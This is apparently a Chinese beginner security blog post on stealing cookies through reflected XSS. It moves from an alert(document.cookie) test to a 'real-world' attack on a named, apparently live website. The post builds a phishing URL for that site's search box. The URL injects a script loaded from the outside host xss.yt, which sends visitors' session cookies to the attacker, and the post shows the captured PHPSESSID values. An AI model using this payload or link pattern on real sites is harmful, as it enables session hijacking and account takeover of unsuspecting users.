网安入门17-XSS(打Cookie)

危害:获取Cookie

开始学习反射型XSS时不知道有什么危害,弹个1没啥用,于是我们利用经典的<script>alert(document.cookie)</script>展开攻击

经过这波操作,我们获得了 敏感信息PHPSESSID=94a7gvd2icb3hva0u255jjadl0

反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie

打Cookie实战

目标:云图AI开放平台

来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie
发现一个搜索框,测试可以弹,证明这个网站存在XSS

此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台
XSS平台-XSS安全测试平台
在这个平台创建一个项目,选择无keepsession

查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接

恶意JS:<sCRiPt sRC=//xss.yt/WnT3></sCrIpT>

钓鱼链接:

https://moomoopark.com/index.php?pro_keyword=%3CsCRiPt%20sRC=//xss.yt/WnT3%3E%3C/sCrIpT%3E&c=search&m=index

zyh666访问钓鱼链接,测试可以收到cookie
其中PHPSESSID=k5ckg7164sldfd8dm4phom2qq5


接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!
其中PHPSESSID=3c4161sbsijrqoq8pjmhquus37


实战打Cookie成功

  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

挑不动

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值